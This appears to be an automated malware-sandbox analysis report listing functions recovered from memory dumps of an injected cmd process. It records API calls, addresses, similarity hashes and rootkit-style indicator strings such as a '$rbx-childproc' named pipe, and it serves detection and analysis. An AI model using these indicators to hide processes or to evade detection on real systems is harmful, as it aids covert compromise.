CloseHandle.KERNEL32 ref: 00000224139025B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 0000022413902549

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 673562c5418f69beaa3eed2ebe839a3604995ae4b12214ed1dddbaf41d4f6b6c
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 2A114F36624B40D3EB10DBA1F4183597B61F389BE8F944315EE9D1AAA8CF3CC594CB40

Function 0000022413932518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002241393252D
GetCurrentProcessId.KERNEL32 ref: 0000022413932537
CreateFileW.KERNEL32 ref: 0000022413932568
WriteFile.KERNEL32 ref: 0000022413932590
ReadFile.KERNEL32 ref: 00000224139325AF
CloseHandle.KERNEL32 ref: 00000224139325B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 0000022413932549

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: fe20daf8bd62df155d6631efef9522a88d9cb0d58ad5dc565e79c52aa84ddf57
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 03114C76624B40D2EB10DFA1F51835A7BA0F789BD8F944315EE9D0AAA8CF7CC194CB40

Function 0000022413907C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000022413907C78
__scrt_acquire_startup_lock.LIBCMT ref: 0000022413907CCA
_RTC_Initialize.LIBCMT ref: 0000022413907CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000022413907D1E
__scrt_release_startup_lock.LIBCMT ref: 0000022413907D49

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 1b4f91bb85a36d3def507e0d1a99e8efdcc441173878d2c003b43c2c962ef5c1
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 2B81C221734641B6FE60BBE5944936D7F99AB857ACF584015AE0C5F39EDB38C8F28700

Function 00000224138D7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000224138D7078
__scrt_acquire_startup_lock.LIBCMT ref: 00000224138D70CA
_RTC_Initialize.LIBCMT ref: 00000224138D70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000224138D711E
__scrt_release_startup_lock.LIBCMT ref: 00000224138D7149

Memory Dump Source

Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: b0b18b4bf853309e175d2e328a58c0d3972fba0d07a07fa84aa3ecb16d0f3746
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 0481B020B002C5A6FF54BFE9A8493997ED0AB8678CF454125BA0D4F7D6DB38E8F58700

Function 0000022413937C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000022413937C78
__scrt_acquire_startup_lock.LIBCMT ref: 0000022413937CCA
_RTC_Initialize.LIBCMT ref: 0000022413937CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000022413937D1E
__scrt_release_startup_lock.LIBCMT ref: 0000022413937D49

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 67e8024c7c5263d3cf412bcbdd954e222507aed034267331d3a21a5c711f4c60
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 6781D2A1634241B6FE50BBF6964D3AE7E91AB8578CF444015AE4C4F7BEDB38C8E58700

Function 0000022413909AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,0000022413909C6B,?,?,?,000002241390945C,?,?,?,?,0000022413908F65), ref: 0000022413909B31
GetLastError.KERNEL32(?,?,?,0000022413909C6B,?,?,?,000002241390945C,?,?,?,?,0000022413908F65), ref: 0000022413909B3F
LoadLibraryExW.KERNEL32(?,?,?,0000022413909C6B,?,?,?,000002241390945C,?,?,?,?,0000022413908F65), ref: 0000022413909B69
FreeLibrary.KERNEL32(?,?,?,0000022413909C6B,?,?,?,000002241390945C,?,?,?,?,0000022413908F65), ref: 0000022413909BD7
GetProcAddress.KERNEL32(?,?,?,0000022413909C6B,?,?,?,000002241390945C,?,?,?,?,0000022413908F65), ref: 0000022413909BE3

Strings

api-ms-, xrefs: 0000022413909B51

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: ad41c0798bd4152d8d46be93dc164ef646207a785e0e9ae7bcaf201a17ac7487
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 1031A321322741E1EE51FB8698087A53BD8B744BB8F5A0625DD1D4F7A8EF38C4E4C310

Function 0000022413939AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,0000022413939C6B,?,?,?,000002241393945C,?,?,?,?,0000022413938F65), ref: 0000022413939B31
GetLastError.KERNEL32(?,?,?,0000022413939C6B,?,?,?,000002241393945C,?,?,?,?,0000022413938F65), ref: 0000022413939B3F
LoadLibraryExW.KERNEL32(?,?,?,0000022413939C6B,?,?,?,000002241393945C,?,?,?,?,0000022413938F65), ref: 0000022413939B69
FreeLibrary.KERNEL32(?,?,?,0000022413939C6B,?,?,?,000002241393945C,?,?,?,?,0000022413938F65), ref: 0000022413939BD7
GetProcAddress.KERNEL32(?,?,?,0000022413939C6B,?,?,?,000002241393945C,?,?,?,?,0000022413938F65), ref: 0000022413939BE3

Strings

api-ms-, xrefs: 0000022413939B51

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 57c064d97f865205982df99bcbef5c6721ec4a37e439091be98df3e775df499f
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: EE31A561322641E1EE11BBA69A087A53BA4BB44BA8F590625DD1D4F7A8DF38C4A4C310

Function 0000022413913400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000022413913431
GetLastError.KERNEL32 ref: 000002241391343D
CloseHandle.KERNEL32 ref: 0000022413913455
CreateFileW.KERNEL32 ref: 0000022413913480
WriteConsoleW.KERNEL32 ref: 000002241391349F

Strings

CONOUT$, xrefs: 0000022413913461

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 0884e7989a5f56012b23c56e7d75e5b62d28f3adea894febd1c847cc45763932
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 38115421320A4096EB51DB92E8587197BA1F788BF8F454214DD5E5BB98CF38C8648740

Function 0000022413943400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000022413943431
GetLastError.KERNEL32 ref: 000002241394343D
CloseHandle.KERNEL32 ref: 0000022413943455
CreateFileW.KERNEL32 ref: 0000022413943480
WriteConsoleW.KERNEL32 ref: 000002241394349F

Strings

CONOUT$, xrefs: 0000022413943461

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 1d1f50bd10ef7023ba4348249dd928e17c740b71aa574e2381e0ff86f82270ad
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: BA118631330B4096EB51ABD2F9987197BA0F788FE8F444214EE5D8BB98DF38C4A48740

Function 0000022413906270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000224139062AB
GetThreadContext.KERNEL32 ref: 0000022413906415

Part of subcall function 00000224139060A0: GetCurrentThreadId.KERNEL32 ref: 00000224139060A4

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: a78d9c73553896ecf604a6a849edbf95b5085880193b2b6bf495002e49aaaf32
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 9CD18B76214B8891DE70EB5AE49835A7BA5F388B9CF100116EECD4B7A9DF3CC591CB40

Function 0000022413936270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000224139362AB
GetThreadContext.KERNEL32 ref: 0000022413936415

Part of subcall function 00000224139360A0: GetCurrentThreadId.KERNEL32 ref: 00000224139360A4

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 2bdfaf704aa1fd5d0113448785289009c65c2e9ee025ad077e29eddc49b2fa15
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 4AD18B76218B8891DE70AB5AE59835A7BA0F788B9CF100116EECD4B779DF3CC591CB40

Function 0000022413902098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000224139020A6
TlsFree.KERNEL32 ref: 000002241390225F
TlsFree.KERNEL32 ref: 000002241390226B
TlsFree.KERNEL32 ref: 0000022413902277
TlsFree.KERNEL32 ref: 0000022413902283
TlsFree.KERNEL32 ref: 000002241390228F

Part of subcall function 0000022413905E50: GetCurrentThreadId.KERNEL32 ref: 0000022413905E66

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 64b904e8e699d37342e973c6215fec607383fd6f471c97baf5dcb264f71426c3
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: FC51D678221F45B5EF45FBA8D8592953BA9BB0474CF840825ED9C4A3ADEF74C5B8C340

Function 0000022413932098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000224139320A6
TlsFree.KERNEL32 ref: 000002241393225F
TlsFree.KERNEL32 ref: 000002241393226B
TlsFree.KERNEL32 ref: 0000022413932277
TlsFree.KERNEL32 ref: 0000022413932283
TlsFree.KERNEL32 ref: 000002241393228F

Part of subcall function 0000022413935E50: GetCurrentThreadId.KERNEL32 ref: 0000022413935E66

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 468bf2887889efb7b264cf0fddcce4d9f8c2ebba3b49529906542ef36a2f8385
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 7151E6B0222B45B5EF15FBA4DA592943BA1BB0874CF800816AD5C0A7BDEF74C5F4C340

Function 00000224139035C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,00000224139024D1), ref: 00000224139035EB
HeapAlloc.KERNEL32(?,?,?,?,?,00000224139024D1), ref: 00000224139035FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,00000224139024D1), ref: 0000022413903673
GetProcessHeap.KERNEL32(?,?,?,?,?,00000224139024D1), ref: 00000224139036D9
HeapFree.KERNEL32(?,?,?,?,?,00000224139024D1), ref: 00000224139036E7

Strings

$rbx-, xrefs: 000002241390366C

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: dacea7f78df401267ef24646c8c44b79f733736f56c51c88b16c05ddf8dbdb9a
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 6531A421721B55A2EE91FF96E58932A7B94FB44B88F084020CF4C0BB59EF34C8F18700

Function 00000224139335C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,00000224139324D1), ref: 00000224139335EB
HeapAlloc.KERNEL32(?,?,?,?,?,00000224139324D1), ref: 00000224139335FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,00000224139324D1), ref: 0000022413933673
GetProcessHeap.KERNEL32(?,?,?,?,?,00000224139324D1), ref: 00000224139336D9
HeapFree.KERNEL32(?,?,?,?,?,00000224139324D1), ref: 00000224139336E7

Strings

$rbx-, xrefs: 000002241393366C

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 4054e640204b09c5ceb1a67b713e58fa3a641998a15135bf51272e6a433aa670
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: AC319361761B55A6EE50FFA6D6892697BA0BB44B8CF0840208F4C0BB69EF34C4F18700

Function 000002241390C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002241390C94F
SetLastError.KERNEL32 ref: 000002241390C96E
FlsSetValue.KERNEL32 ref: 000002241390C997
FlsSetValue.KERNEL32 ref: 000002241390C9A8
FlsSetValue.KERNEL32 ref: 000002241390C9B9

Part of subcall function 000002241390D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002241390674A), ref: 000002241390D2B6
Part of subcall function 000002241390D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002241390674A), ref: 000002241390D2C0

SetLastError.KERNEL32 ref: 000002241390C9DC

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 73859780a70b5d47c9c156c4bf445129e90d169c579b8ff824d51ec78ed383cd
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 5611772133078062FE54B7F5645D36E3A5A9B857ACF544624AC6F5E3CECE38C8E14700

Function 000002241393C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002241393C94F
SetLastError.KERNEL32 ref: 000002241393C96E
FlsSetValue.KERNEL32 ref: 000002241393C997
FlsSetValue.KERNEL32 ref: 000002241393C9A8
FlsSetValue.KERNEL32 ref: 000002241393C9B9

Part of subcall function 000002241393D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002241393674A), ref: 000002241393D2B6
Part of subcall function 000002241393D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002241393674A), ref: 000002241393D2C0

SetLastError.KERNEL32 ref: 000002241393C9DC

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

